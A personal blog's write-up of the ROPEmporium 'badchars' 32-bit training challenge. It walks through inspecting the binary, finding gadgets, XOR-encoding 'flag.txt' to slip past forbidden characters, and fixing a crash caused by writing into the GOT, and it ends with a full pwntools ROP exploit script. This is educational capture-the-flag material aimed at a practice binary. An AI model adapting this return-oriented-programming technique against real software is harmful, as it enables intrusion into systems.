<!DOCTYPE html>
<html lang="en-us">
<title>ROPEmporium: badchars 32-bit | </title>
<meta charset="utf-8">
<meta name="generator" content="Hugo 0.80.0" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="https://cavetownie.github.io/css/index.css">
<link rel="canonical" href="https://cavetownie.github.io/posts/badchars32bit/">
<link rel="alternate" type="application/rss+xml" href="" title="">

<header>
  
    <a href="https://cavetownie.github.io/" class="title"></a>
  
  
    <nav>
    
      <a href="/">Blog</a>
    
      <a href="/about/">About</a>
    
      <a href="/challenges/">Challenges</a>
    
      <a href="/index.xml">RSS</a>
    
    </nav>
  
</header>

<article>
  <header>
    <h1>ROPEmporium: badchars 32-bit</h1>
    <time datetime="2021-05-24T19:58:00&#43;02:00">May 24, 2021</time>
  </header>
  <h1 id="writeup-of-bad-characters-badchars-on-ropemporium">Writeup of bad characters [badchars] on ROPEmporium</h1>
<p>Prerequisites: Knowledge from previous challs, XOR (Exclusive Or)</p>
<hr>
<p>This was a more difficult exploit to create, due to the fact that we had bad characters</p>
<p>As usual I started checking the security settings on the binary provided</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">cave<span style="color:#960050;background-color:#1e0010">@</span>noobpwn:<span style="color:#f92672">~/</span>binexp<span style="color:#f92672">/</span>ROP<span style="color:#f92672">-</span>emperium<span style="color:#f92672">/</span>badchars_32<span style="color:#960050;background-color:#1e0010">$</span> checksec badchars32

[<span style="color:#f92672">*</span>] <span style="color:#960050;background-color:#1e0010">&#39;</span><span style="color:#f92672">/</span>home<span style="color:#f92672">/</span>cave<span style="color:#f92672">/</span>binexp<span style="color:#f92672">/</span>ROP<span style="color:#f92672">-</span>emperium<span style="color:#f92672">/</span>badchars_32<span style="color:#f92672">/</span>badchars32<span style="color:#960050;background-color:#1e0010">&#39;</span>
    Arch:     i386<span style="color:#f92672">-</span><span style="color:#ae81ff">32</span><span style="color:#f92672">-</span>little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (<span style="color:#ae81ff">0x8048000</span>)
    RUNPATH:  b<span style="color:#e6db74">&#39;.&#39;</span>
</code></pre></div><p>We see that there is NX enabled.</p>
<p>Next we run the program. I get the output &ldquo;badchars are: &lsquo;x&rsquo;, &lsquo;g&rsquo;, &lsquo;a&rsquo;, &lsquo;.&rsquo;</p>
<p>These are the characters we want to avoid. We want to read the file &ldquo;flag.txt&rdquo;, which has all of the bad characters present. Fuck.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">pwndbg<span style="color:#f92672">&gt;</span> info functions
Non<span style="color:#f92672">-</span>debugging symbols:
<span style="color:#ae81ff">0x080483b0</span>  pwnme<span style="color:#960050;background-color:#1e0010">@</span>plt
<span style="color:#ae81ff">0x080483d0</span>  print_file<span style="color:#960050;background-color:#1e0010">@</span>plt
<span style="color:#ae81ff">0x080483f0</span>  _start
<span style="color:#ae81ff">0x08048506</span>  main
<span style="color:#ae81ff">0x0804852a</span>  usefulFunction
<span style="color:#ae81ff">0x08048543</span>  usefulGadgets
</code></pre></div><p>The usefulGadgets are at 0x08048543. Let&rsquo;s disassemble that!</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">pwndbg<span style="color:#f92672">&gt;</span> disass <span style="color:#ae81ff">0x08048543</span>
Dump of assembler code <span style="color:#66d9ef">for</span> function usefulGadgets:
   <span style="color:#ae81ff">0x08048543</span> <span style="color:#f92672">&lt;+</span><span style="color:#ae81ff">0</span><span style="color:#f92672">&gt;:</span>	add    BYTE PTR [ebp<span style="color:#f92672">+</span><span style="color:#ae81ff">0x0</span>],bl
   <span style="color:#ae81ff">0x08048546</span> <span style="color:#f92672">&lt;+</span><span style="color:#ae81ff">3</span><span style="color:#f92672">&gt;:</span>	ret    
   <span style="color:#ae81ff">0x08048547</span> <span style="color:#f92672">&lt;+</span><span style="color:#ae81ff">4</span><span style="color:#f92672">&gt;:</span>	xor    BYTE PTR [ebp<span style="color:#f92672">+</span><span style="color:#ae81ff">0x0</span>],bl
   <span style="color:#ae81ff">0x0804854a</span> <span style="color:#f92672">&lt;+</span><span style="color:#ae81ff">7</span><span style="color:#f92672">&gt;:</span>	ret    
   <span style="color:#ae81ff">0x0804854b</span> <span style="color:#f92672">&lt;+</span><span style="color:#ae81ff">8</span><span style="color:#f92672">&gt;:</span>	sub    BYTE PTR [ebp<span style="color:#f92672">+</span><span style="color:#ae81ff">0x0</span>],bl
   <span style="color:#ae81ff">0x0804854e</span> <span style="color:#f92672">&lt;+</span><span style="color:#ae81ff">11</span><span style="color:#f92672">&gt;:</span>	ret    
   <span style="color:#ae81ff">0x0804854f</span> <span style="color:#f92672">&lt;+</span><span style="color:#ae81ff">12</span><span style="color:#f92672">&gt;:</span>	mov    DWORD PTR [edi],esi
   <span style="color:#ae81ff">0x08048551</span> <span style="color:#f92672">&lt;+</span><span style="color:#ae81ff">14</span><span style="color:#f92672">&gt;:</span>	ret    
End of assembler dump.
pwndbg<span style="color:#f92672">&gt;</span> 
</code></pre></div><p>*Data been removed for readability</p>
<p>In the description of the challenge on the site, it said something along the lines of &ldquo;Maybe you could change the string, once it is in memory?&rdquo;</p>
<p>I wanted to use the xor gadget for this, because I couldn&rsquo;t quite wrap my head around how I should use the add or sub gadgets.
We&rsquo;re also given the &ldquo;mov DWORD ptr [edi],  esi&rdquo;. What this gadget does is move the value of esi into the address of edi.</p>
<p>We need a few more gadgets before we can start planning our ROPchain. We need a gadget to control esi, and edi.</p>
<p>I tried to use ropper, but gave up and just used what I was comfortable with:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">cave<span style="color:#960050;background-color:#1e0010">@</span>noobpwn:<span style="color:#f92672">~/</span>binexp<span style="color:#f92672">/</span>ROP<span style="color:#f92672">-</span>emperium<span style="color:#f92672">/</span>badchars_32<span style="color:#960050;background-color:#1e0010">$</span> ROPgadget <span style="color:#f92672">--</span>binary badchars32 <span style="color:#f92672">|</span> grep <span style="color:#e6db74">&#34;pop esi&#34;</span>

<span style="color:#ae81ff">0x080485b9</span> <span style="color:#f92672">:</span> pop esi ; pop edi ; pop ebp ; ret
</code></pre></div><p>Another useful gadget, but do we don&rsquo;t need the &ldquo;pop ebp&rdquo;, so we&rsquo;ll just fill that with garbage</p>
<p>Gadgets I want to use:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">xor byte ptr [ebp],bl
mov dword ptr [edi], esi
pop esi, pop edi, pop ebp
pop ebp (to set addr <span style="color:#66d9ef">for</span> xor)
pop ebx (to set bl <span style="color:#66d9ef">for</span> xor)
</code></pre></div><p>I also needed to check what addresspaces were writable, otherwise I couldn&rsquo;t write my string anywhere. I did this with radare2 and the iS function. You can also use readelf -S <!-- raw HTML omitted --></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">addr	      vsize 	  name	
<span style="color:#ae81ff">0x08049efc</span>    <span style="color:#ae81ff">0x4</span> <span style="color:#f92672">-</span>rw<span style="color:#f92672">-</span> .init_array
<span style="color:#ae81ff">0x08049f00</span>    <span style="color:#ae81ff">0x4</span> <span style="color:#f92672">-</span>rw<span style="color:#f92672">-</span> .fini_array
<span style="color:#ae81ff">0x08049f04</span>   <span style="color:#ae81ff">0xf8</span> <span style="color:#f92672">-</span>rw<span style="color:#f92672">-</span> .dynamic
<span style="color:#ae81ff">0x08049ffc</span>    <span style="color:#ae81ff">0x4</span> <span style="color:#f92672">-</span>rw<span style="color:#f92672">-</span> .got
<span style="color:#ae81ff">0x0804a000</span>   <span style="color:#ae81ff">0x18</span> <span style="color:#f92672">-</span>rw<span style="color:#f92672">-</span> .got.plt
<span style="color:#ae81ff">0x0804a018</span>    <span style="color:#ae81ff">0x8</span> <span style="color:#f92672">-</span>rw<span style="color:#f92672">-</span> .data
<span style="color:#ae81ff">0x0804a020</span>    <span style="color:#ae81ff">0x4</span> <span style="color:#f92672">-</span>rw<span style="color:#f92672">-</span> .bss
</code></pre></div><p>Now I was ready to plan my ROPchain.</p>
<p>I planned my masterplan:</p>
<pre><code>Step 1. Move a string into a writeable datasegment

Step 2. XOR the string bytewise, so that its equal to flag

Step 3. Do step 1, but with .txt

Step 4. Call useFunc, printfile@plt 

Step 5. ?????

Step 6. Profit
</code></pre><p>This proved to be more difficult that I had wanted. I first wrote a small python script:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">badChars<span style="color:#f92672">=</span>[<span style="color:#e6db74">&#34;x&#34;</span>,<span style="color:#e6db74">&#34;g&#34;</span>,<span style="color:#e6db74">&#34;a&#34;</span>,<span style="color:#e6db74">&#34;.&#34;</span>]


<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">xory</span>(string):
    <span style="color:#66d9ef">for</span> x <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">0</span>,<span style="color:#ae81ff">3</span>):
        chars<span style="color:#f92672">=</span>[]
        <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> string:
            a <span style="color:#f92672">=</span> chr(ord(i)<span style="color:#f92672">^</span>x)
            <span style="color:#66d9ef">if</span> a <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> badChars:
                chars<span style="color:#f92672">.</span>append(a)
                <span style="color:#66d9ef">if</span> len(chars)<span style="color:#f92672">==</span><span style="color:#ae81ff">4</span>:
                    <span style="color:#66d9ef">print</span>(f<span style="color:#e6db74">&#34;key is {x}: {chars}&#34;</span>)<span style="color:#75715e">#.join(chars))</span>

xory(<span style="color:#e6db74">&#34;flag&#34;</span>)
<span style="color:#66d9ef">print</span>(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
xory(<span style="color:#e6db74">&#34;.txt&#34;</span>)
</code></pre></div><p>I ran it:</p>
<pre><code>key is 2: ['d', 'n', 'c', 'e']

key is 1: ['/', 'u', 'y', 'u']
key is 2: [',', 'v', 'z', 'v']
</code></pre><p>So we get a string &ldquo;dnce&rdquo; when xored with 2, will equal flag
And another string &ldquo;,vzv&rdquo; when xored with 2, will equal .txt</p>
<p>Nice!</p>
<p>So we need to find our address in data, and xor that. Then we xor that address+0, address+1, address+2, address+3. And then the entire address is xored.</p>
<p>We repeat that process and use it once again but with &ldquo;,vzv&rdquo; instead.</p>
<p>Aaaaaaaaaand we get an error:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">Program received signal SIGSEGV, Segmentation fault.
 <span style="color:#960050;background-color:#1e0010">►</span> <span style="color:#ae81ff">0xf7f4f7e6</span>    mov    ecx, dword ptr [eax <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x34</span>]
</code></pre></div><p>Wait&hellip; What? Now I was confused. I tried without the second part of the code, and I received this error:</p>
<pre><code>b&quot;Thank you!\nFailed to open file: flag\x90\x99\xf4\xf7\x10;\xf3\xf7\xbd&amp;\xf1\xf7\xf0\xed\xd2\xf7\xcf'\xf1\xf7\n\nChild exited with status 1\n&quot;
</code></pre><p>What the fuck? Atleast it&rsquo;s a somewhat positive error. I know that it did indeed change dnce to flag in data. But it kept reading many more bytes
afterwards&hellip;. Weird&hellip; I tried tried using the second part of the code but adding a nullbyte, but I just got the same:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"> <span style="color:#960050;background-color:#1e0010">►</span> <span style="color:#ae81ff">0xf7f4f7e6</span>    mov    ecx, dword ptr [eax <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x34</span>]
</code></pre></div><p>A crucial lesson was then learned. The GOT is also known as the Global Offset Table, and is used for holding addresses of functions, that need to be called. I was quite literally writing to the space in memory, that holds function addresses, does that seem smart, when I&rsquo;m trying to call a print_file function? No? No, not really.</p>
<p>So let&rsquo;s try it with a different memory segment:, I used a segment with 4 bytes of size</p>
<pre><code>b&quot;Thank you!\nFailed to open file: flag\n\nChild exited with status 1\n&quot;
</code></pre><p>Ofcourse this would yield an error since the flag is in &ldquo;flag.txt&rdquo;, and we only control 4 bytes</p>
<p>I tried again but with .data, which is 8 bytes and boom!</p>
<pre><code>b'Thank you!\nROPE{a_placeholder_32byte_flag!}\n'
</code></pre><p>Exploit:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#Is it too late now to say XORy?</span>

<span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>

elfPath<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;./badchars32&#34;</span>
context<span style="color:#f92672">.</span>arch<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;i386&#34;</span>

<span style="color:#75715e">#BL is the lower 8 bits/1 byte of ebx: pop ebx=0xdeadbeef, then bl=&#34;ef&#34; (or something like this)</span>


useFunc<span style="color:#f92672">=</span>p32(<span style="color:#ae81ff">0x08048538</span>) <span style="color:#75715e">#print</span>
datasegm<span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0804a018</span> 

xor_ebp_bl <span style="color:#f92672">=</span> p32(<span style="color:#ae81ff">0x08048547</span>) <span style="color:#75715e">#xor [ebp],bl</span>
mov_edi_esi <span style="color:#f92672">=</span> p32(<span style="color:#ae81ff">0x0804854f</span>) <span style="color:#75715e">#mov [edi], esi</span>

pop_esi_edi_ebp<span style="color:#f92672">=</span>p32(<span style="color:#ae81ff">0x080485b9</span>)      <span style="color:#75715e">#pop esi; pop edi; pop ebp; ret</span>
pop_ebx<span style="color:#f92672">=</span>p32(<span style="color:#ae81ff">0x0804839d</span>)      <span style="color:#75715e">#pop ebx; ret</span>
pop_ebp<span style="color:#f92672">=</span>p32(<span style="color:#ae81ff">0x080485bb</span>)      <span style="color:#75715e">#pop ebp; ret</span>

badCharstxt<span style="color:#f92672">=</span>[<span style="color:#e6db74">&#34;x&#34;</span>,<span style="color:#e6db74">&#34;g&#34;</span>,<span style="color:#e6db74">&#34;a&#34;</span>,<span style="color:#e6db74">&#34;.&#34;</span>]

gdbscript<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;&#34;
</span><span style="color:#e6db74">c
</span><span style="color:#e6db74">&#34;&#34;&#34;</span>

terminalSetting <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#39;gnome-terminal&#39;</span>, <span style="color:#e6db74">&#39;-e&#39;</span>]
context<span style="color:#f92672">.</span>clear(terminal<span style="color:#f92672">=</span>terminalSetting)

io <span style="color:#f92672">=</span> pwnlib<span style="color:#f92672">.</span>gdb<span style="color:#f92672">.</span>debug(elfPath, gdbscript <span style="color:#f92672">=</span> gdbscript)

<span style="color:#75715e">#mnm = cyclic_gen()</span>
<span style="color:#75715e">#mnm = mnm.get(80)</span>
point<span style="color:#f92672">=</span>cyclic_find(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;laaa&#34;</span>, endian<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;little&#34;</span>)
<span style="color:#75715e">#6161616c is at the return or laaa</span>


<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>():
    <span style="color:#66d9ef">print</span>(io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#34;&gt; &#34;</span>))

    payload<span style="color:#f92672">=</span><span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;A&#34;</span><span style="color:#f92672">*</span>point <span style="color:#75715e">#padding</span>
    
    payload<span style="color:#f92672">+=</span>pop_esi_edi_ebp<span style="color:#f92672">+</span><span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;dnce&#34;</span><span style="color:#f92672">+</span>p32(datasegm)<span style="color:#f92672">+</span>p32(datasegm) <span style="color:#75715e">#Sets esi=&#34;dnce&#34;, edi=address of .data, ebp=address of .data</span>
    payload<span style="color:#f92672">+=</span>mov_edi_esi <span style="color:#75715e">#moves esi into the address of edi (&#34;dnce&#34; -&gt; .data)</span>

<span style="color:#75715e">######################################################</span>
    payload<span style="color:#f92672">+=</span>pop_ebx<span style="color:#f92672">+</span>p32(<span style="color:#ae81ff">2</span>) <span style="color:#75715e">#sets ebx=2</span>
    
    payload<span style="color:#f92672">+=</span>xor_ebp_bl <span style="color:#75715e">#xor datasegm with 2</span>
    
    payload<span style="color:#f92672">+=</span>pop_ebp<span style="color:#f92672">+</span>p32(datasegm<span style="color:#f92672">+</span><span style="color:#ae81ff">1</span>)
    payload<span style="color:#f92672">+=</span>xor_ebp_bl <span style="color:#75715e">#xor datasegm+1 with 2</span>

    payload<span style="color:#f92672">+=</span>pop_ebp<span style="color:#f92672">+</span>p32(datasegm<span style="color:#f92672">+</span><span style="color:#ae81ff">2</span>)
    payload<span style="color:#f92672">+=</span>xor_ebp_bl <span style="color:#75715e">#so on</span>

    payload<span style="color:#f92672">+=</span>pop_ebp<span style="color:#f92672">+</span>p32(datasegm<span style="color:#f92672">+</span><span style="color:#ae81ff">3</span>)
    payload<span style="color:#f92672">+=</span>xor_ebp_bl

<span style="color:#75715e">######################################################</span>
    
    payload<span style="color:#f92672">+=</span>pop_esi_edi_ebp<span style="color:#f92672">+</span><span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;,vzv&#34;</span><span style="color:#f92672">+</span>p32(datasegm<span style="color:#f92672">+</span><span style="color:#ae81ff">0x4</span>)<span style="color:#f92672">+</span>p32(datasegm<span style="color:#f92672">+</span><span style="color:#ae81ff">0x4</span>) <span style="color:#75715e">#Sets esi=&#34;,vzv&#34;, edi=address of .data, ebp=address of .data</span>
    payload<span style="color:#f92672">+=</span>mov_edi_esi <span style="color:#75715e">#moves esi into the address of edi (&#34;,vzv&#34; -&gt; .data+0x4)</span>

<span style="color:#75715e">######################################################</span>
    payload<span style="color:#f92672">+=</span>pop_ebx<span style="color:#f92672">+</span>p32(<span style="color:#ae81ff">2</span>) <span style="color:#75715e">#sets ebx=2</span>

    payload<span style="color:#f92672">+=</span>xor_ebp_bl <span style="color:#75715e">#xor datasegm with 2</span>

    payload<span style="color:#f92672">+=</span>pop_ebp<span style="color:#f92672">+</span>p32(datasegm<span style="color:#f92672">+</span><span style="color:#ae81ff">5</span>)
    payload<span style="color:#f92672">+=</span>xor_ebp_bl <span style="color:#75715e">#xor datasegm+1 with 2</span>

    payload<span style="color:#f92672">+=</span>pop_ebp<span style="color:#f92672">+</span>p32(datasegm<span style="color:#f92672">+</span><span style="color:#ae81ff">6</span>)
    payload<span style="color:#f92672">+=</span>xor_ebp_bl <span style="color:#75715e">#so on</span>

    payload<span style="color:#f92672">+=</span>pop_ebp<span style="color:#f92672">+</span>p32(datasegm<span style="color:#f92672">+</span><span style="color:#ae81ff">7</span>)
    payload<span style="color:#f92672">+=</span>xor_ebp_bl

<span style="color:#75715e">######################################################</span>
    payload<span style="color:#f92672">+=</span>useFunc<span style="color:#f92672">+</span>p32(datasegm)

    io<span style="color:#f92672">.</span>send(payload)
    <span style="color:#66d9ef">print</span>(io<span style="color:#f92672">.</span>recv(<span style="color:#ae81ff">2048</span>))
    io<span style="color:#f92672">.</span>interactive()
</code></pre></div>
</article>



</html>
